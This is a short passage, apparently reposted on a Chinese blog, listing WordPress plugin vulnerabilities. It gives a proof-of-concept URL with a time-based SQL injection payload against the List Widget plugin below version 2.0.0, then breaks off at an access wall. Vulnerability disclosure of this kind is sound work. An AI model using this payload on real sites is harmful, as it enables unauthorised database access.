阅读背景:

最近的wordpress插件漏洞整理_weixin_30399797的博客

来源:互联网 
# WordPress 的List Widget插件在低于 2.0.0版本中存在 SQL注入漏洞 # 测试版本: 2.0.0 --- PoC --- https://localhost/wp-content/plugins/knr-author-list-widget/knrAuthorListCustomSortSave.php?listItem[]=-1 AND 1=IF(2>1,BENCHMARK(5000000,MD5(CHAR(115,113,108,109,97,112))),0) --------------- 存在漏洞的代码 --------------- # WordPress 的List Widget插件在低于 2.0.0版本中存在 SQ



你的当前访问异常,请进行认证后继续阅读剩余内容。

分享到: